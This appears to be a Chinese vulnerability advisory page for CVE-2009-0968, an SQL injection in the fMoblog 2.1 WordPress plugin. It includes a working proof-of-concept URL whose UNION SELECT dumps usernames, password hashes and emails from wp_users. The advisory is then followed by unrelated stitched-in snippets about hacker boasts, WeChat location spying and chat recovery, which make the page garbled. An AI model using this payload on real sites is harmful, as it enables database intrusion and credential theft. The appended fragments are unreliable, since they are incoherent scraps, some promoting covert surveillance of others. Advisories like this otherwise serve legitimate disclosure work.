影响版本:
Fahlstad fMoblog 2.1
漏洞描述:
BUGTRAQ ID: 34147
CVE(CAN) ID: CVE-2009-0968
fMoblog是Wordpress所使用的移动博客插件,允许用户从手机张贴图形和描述等信息。
如果将page_id设置为已有的值的话,则fmoblog.php模块没有正确地验证index.php中对id参数所传送的输入便在SQL查询中使用,这允许远程攻击者通过提交恶意请求执行SQL注入攻击,完全入侵后端数据库系统。
<*参考
strange kevin (strange.kevin@gmail.com)
http://secuni *** /advisories/34341/.
*>
SEBUG安全建议:
厂商补丁:
Fredrik Fahlstad
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.fahlstad.se/wp-plugins/fmoblog/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
2018年11月以来,在国外社交平台Twitter上,有不少恶意黑客“晒”出了其攻击多个单位官网的“战果”:好生嚣张!据小编向国内安全厂商知道创宇求证,其404积极防御实验室在创宇盾网站舆情监测平台发...
来源:CoolDiyer's Blog 注册表1. HKEY_LOCAL_MACHINE\Software\Microsoft\windows/">windows\Curr entVersion...
黑客针对的是老人的人机群,预装的假冒微信版本经常推送骚扰广告.随着手机短信功能的弱化,微信已经成为大多数人的主要通信方式之一。为了方便与儿童接触,越来越多的中老年群体也表现出对微信的严格需求。出乎意料...
微信聊天记录删除了怎么恢复?悄悄告诉你恢复聊天记录的几种方法,在她丈夫出轨后,萧三把我的微信加了进去,一起发送亲密照片。 我知道她想惹恼我,但我没有上当。 只要我取代我妻子的位置,不管情妇做什么,...
来源:黑客防线作者:LoveMelody 看了ISNO大虾的《我是如何发现CCProxy漏洞的》,心里痒痒的,也想按照ISNO大虾介绍的方法,依葫芦画瓢的分析分析一个漏洞。分析什么漏洞呢?F.Zh在...
用微信偷看对方位置 信息化手机对咱们来说是必不行少的,彷佛没有手机咱们甚么都做不了,因此有人乃至寻开心说本日的人是“手机的仆从”。当今每片面都有一部能够上网的手机,微信曾经成为咱们紧张的交流对象。咱...